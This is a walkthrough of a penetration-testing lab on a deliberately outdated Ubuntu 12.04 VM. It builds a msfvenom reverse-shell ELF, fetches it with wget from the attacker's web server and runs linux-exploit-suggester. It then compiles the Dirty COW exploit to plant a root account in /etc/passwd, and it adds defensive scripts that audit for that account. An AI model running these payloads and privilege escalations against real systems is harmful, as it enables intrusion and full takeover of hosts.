# Kernel Conf Exploit

## <mark style="color:green;">Configuring Ubuntu Server to make it vulnerable</mark>

## <mark style="color:purple;">Ubuntu OVA configured for kernel exploitation</mark>

Ubuntu 12.04 OVA URL = <https://drive.google.com/file/d/14P2ni0NgInscdBcKnKvWQSXQ36MqcjHq/view?usp=sharing>

OVA credentials = diseo:diseo

> If you prefer to grab the ISO directly, this is the page.

ISO URL = <https://old-releases.ubuntu.com/releases/12.04/>

### Basic update configuration for Ubuntu Server

First we change a few settings and temporarily enable `ssh` so we can work from a better shell.

We configure the package sources so that the system can still update and is not left so out of date.

```shell
sudo nano /etc/apt/sources.list
```

Inside this file, comment out every uncommented line with a `#` and add the following at the end of the file.

```
deb http://old-releases.ubuntu.com/ubuntu/ precise main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse
```

Save it and run the following so the package index refreshes correctly.

```shell
sudo apt-get update
```

Once updated, we can enable `ssh` as follows.

```shell
sudo apt-get install openssh-server
```

And in case it is not already running.

```shell
sudo service ssh start
```

### Getting a shell (Easy)

First we create an `.elf` with `msfvenom` to pass to the victim machine and get a shell.

```shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
```

Now we start a `python3` web server and transfer it to the victim machine.

```shell
python3 -m http.server 80
```

On the victim machine we do the following.

```shell
wget http://<IP>/shell.elf
```

Now we set up the listener in metasploit.

```shell
msfconsole -q
```

```shell
use multi/handler
```

We configure the handler to listen on our IP and port.

```shell
set payload linux/x64/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
```

Start the listener.

```shell
run
```

Once that is done, run the `shell.elf` file on the victim machine as follows.

```shell
./shell.elf
```

If we go back to the metasploit listener, we will see a shell as the user who ran it.

## <mark style="color:purple;">Exploiting the Ubuntu 12.04 kernel</mark>

First we check the victim machine's kernel version as follows.

```shell
uname -a
```

Info:

```
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
```

The kernel is `3.2.0-23-generic`, so we check whether it has any known vulnerabilities as follows.

GitHub URL = <https://github.com/The-Z-Labs/linux-exploit-suggester>

Clone the repository to our host.

```shell
git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
cd linux-exploit-suggester
```

Rename the `.sh` script.

```shell
mv linux-exploit-suggester.sh les.sh
```

Now we go back to our `meterpreter`.

```shell
cd /tmp/
```

```shell
upload /linux-exploit-suggester/les.sh
```

Info:

```
[*] Uploading  : /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
[*] Uploaded -1.00 B of 88.73 KiB (-0.0%): /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
[*] Completed  : /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
```

Once the file is on the victim machine, we run it.

```shell
shell
/bin/bash -i
```

```shell
chmod +x les.sh
```

```shell
./les.sh
```

Info:

```
Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
   Download URL: https://www.exploit-db.com/download/26131
   Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
   Download URL: https://cyseclabs.com/exploits/vnik_v1.c
   Comments: No SMEP/SMAP bypass

[+] [CVE-2015-3202] fuse (fusermount)

   Details: http://seclists.org/oss-sec/2015/q2/520
   Exposure: probable
   Tags: debian=7.0|8.0,[ ubuntu=* ]
   Download URL: https://www.exploit-db.com/download/37089
   Comments: Needs cron or system admin interaction

[+] [CVE-2014-4699] ptrace/sysret

   Details: http://www.openwall.com/lists/oss-security/2014/07/08/16
   Exposure: probable
   Tags: [ ubuntu=12.04 ]
   Download URL: https://www.exploit-db.com/download/34134

[+] [CVE-2014-4014] inode_capable

   Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
   Exposure: probable
   Tags: [ ubuntu=12.04 ]
   Download URL: https://www.exploit-db.com/download/33824

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2015-9322] BadIRET

   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230

[+] [CVE-2014-5207] fuse_suid

   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923

[+] [CVE-2014-0196] rawmodePTY

   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516

[+] [CVE-2013-2094] semtex

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: less probable
   Tags: RHEL=6
   Download URL: https://www.exploit-db.com/download/25444

[+] [CVE-2013-1959] userns_root_sploit

   Details: http://www.openwall.com/lists/oss-security/2013/04/29/1
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/25450

[+] [CVE-2013-0268] msr

   Details: https://www.exploit-db.com/exploits/27297/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/27297

[+] [CVE-2012-0809] death_star (sudo)

   Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
   Exposure: less probable
   Tags: fedora=16
   Download URL: https://www.exploit-db.com/download/18436
```

This gives us a list, with details for each one, of the different vulnerabilities affecting the current kernel, so we pick one of them; in my case:

```
URL = https://www.exploit-db.com/exploits/40839

Download = https://www.exploit-db.com/download/40839
```
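Reading the same report from the defender's side: the entries les.sh prints follow a fixed layout (a `[+] [CVE-...] name` header followed by indented `Exposure:` and `Tags:` lines), so a saved report can be reduced to a short list for whoever has to patch the host. The script below is an added example, not part of this write-up or of linux-exploit-suggester; it assumes the report was saved with `./les.sh > les-report.txt` (the file name is an assumption) and embeds a constructed sample in that format so it runs offline.

```shell
#!/bin/sh
# Added example, not part of the original write-up: summarise a saved
# linux-exploit-suggester report so the findings can be handed to whoever
# patches the host. Assumes the report was captured with
# "./les.sh > les-report.txt" (the file name is an assumption).

# les_summary REPORT [EXPOSURE]
# Prints one tab-separated line per finding: CVE id(s), name, exposure.
# If EXPOSURE is given ("highly probable", "probable", "less probable"),
# only findings at that level are printed.
les_summary() {
    awk -v want="${2:-}" '
        # Finding header, e.g. "[+] [CVE-2016-5195] dirtycow"
        /^\[\+\] \[CVE-/ {
            cve = $2
            gsub(/\[|\]/, "", cve)
            name = $0
            sub(/^\[\+\] \[[^ ]*\] /, "", name)
            next
        }
        # Indented "Exposure: ..." line that belongs to the last header seen
        /^[ \t]*Exposure:/ {
            exposure = $0
            sub(/^[ \t]*Exposure:[ \t]*/, "", exposure)
            if (want == "" || exposure == want)
                printf "%s\t%s\t%s\n", cve, name, exposure
        }
    ' "$1"
}

# les_count REPORT EXPOSURE -> number of findings at that exposure level
les_count() {
    les_summary "$1" "$2" | wc -l | tr -d ' '
}

# Constructed sample in the format les.sh prints (three entries taken from
# the report above), so the functions can be exercised offline.
LES_SAMPLE="$(mktemp)"
cat > "$LES_SAMPLE" <<'EOF'
Possible Exploits:

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ ubuntu=16.04|14.04|12.04 ]

[+] [CVE-2014-4699] ptrace/sysret

   Details: http://www.openwall.com/lists/oss-security/2014/07/08/16
   Exposure: probable
   Tags: [ ubuntu=12.04 ]

[+] [CVE-2021-3156] sudo Baron Samedit

   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
EOF

# Usage: list only the findings most likely to apply to this host.
les_summary "$LES_SAMPLE" "highly probable"
```

The filter matches the exposure string exactly, so `probable` does not also pull in `highly probable`; the `Tags:` lines are deliberately ignored, because the bracketed `[ ubuntu=12.04 ]` marker there is the tool's own highlighting of the matched distribution and would otherwise be confused with a finding header.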

Once we have downloaded it to our host, we transfer it to the victim machine.

```
Ctrl+z
y+ENTER
```

And we go back to our meterpreter shell to upload the file.

```shell
upload /Downloads/40839.c
```

Info:

```
[*] Uploading  : /Downloads/40839.c -> 40839.c
[*] Uploaded -1.00 B of 4.89 KiB (-0.02%): /Downloads/40839.c -> 40839.c
[*] Completed  : /Downloads/40839.c -> 40839.c
```

Now we return to the normal shell with the following.

```shell
shell
/bin/bash -i
```

Now we rename the file.

```shell
mv 40839.c dirty.c
```

Then we compile it as follows.

```shell
gcc -pthread dirty.c -o dirty -lcrypt
```

Now we run it, passing the password we want set for the new user with `root` privileges.

```shell
./dirty <NEW_PASS>
```

Info:

```
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash

mmap: 7fe680afd000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
diseo@ubuntu:/tmp$ /etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash

mmap: 7fe680afd000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
```

Once it has run, if we look at the `passwd` file we will see a user named `firefart` with `root`'s `bash`, so we switch to that user with the password we entered.

(It also tells us that the user is `firefart` and the password is whatever we set, `1234` in my case.)

```shell
ssh firefart@<IP>
```

Once we enter the password we are logged in as that `root` user; running `id` shows the following.

```shell
id
```

Info:

```
uid=0(firefart) gid=0(root) groups=0(root)
```

So we are `root`.
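The run above leaves two tell-tale artefacts on the host: an extra account with UID 0 in `passwd` and the `/tmp/passwd.bak` backup the exploit itself reminds you to restore. The following read-only audit is an added example, not part of this write-up or of the exploit; it checks a passwd file and a temp directory for both and embeds constructed samples (a clean file and one carrying the `firefart` line shown in the output above) so it runs without touching the real `/etc/passwd`.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a read-only audit of a
# passwd file for the artefacts the Dirty COW run above leaves behind
# (an extra UID-0 account and the /tmp/passwd.bak backup). Useful for
# checking a host, or for verifying that the lab was cleaned up.

# uid0_accounts PASSWD_FILE
# Prints every account name whose UID is 0 other than "root".
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# passwd_audit PASSWD_FILE [TMP_DIR]
# Returns 0 when nothing suspicious is found, 1 otherwise; prints findings.
passwd_audit() {
    tmpdir="${2:-/tmp}"
    status=0
    extra="$(uid0_accounts "$1")"
    if [ -n "$extra" ]; then
        echo "UID 0 accounts besides root: $(echo "$extra" | tr '\n' ' ')"
        status=1
    fi
    if [ -f "$tmpdir/passwd.bak" ]; then
        echo "exploit backup present: $tmpdir/passwd.bak (compare it with $1)"
        status=1
    fi
    return "$status"
}

# Constructed samples: a clean passwd and one carrying the firefart line that
# the exploit output above shows being written. No real file is touched.
CLEAN_PASSWD="$(mktemp)"
printf 'root:x:0:0:root:/root:/bin/bash\ndiseo:x:1000:1000:diseo:/home/diseo:/bin/bash\n' > "$CLEAN_PASSWD"
TAMPERED_PASSWD="$(mktemp)"
printf 'firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash\ndiseo:x:1000:1000:diseo:/home/diseo:/bin/bash\n' > "$TAMPERED_PASSWD"
SAMPLE_TMP="$(mktemp -d)"   # stands in for /tmp so the backup check is isolated

# Usage: audit the tampered sample (returns 1 and prints the finding).
passwd_audit "$TAMPERED_PASSWD" "$SAMPLE_TMP" || echo "audit flagged the host"
```

On a real host you would call `passwd_audit /etc/passwd` and let it default to `/tmp`; a backup file that is newer than the boot time, or a passwd whose first line is no longer `root`, is worth a closer look even when the account has since been removed.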
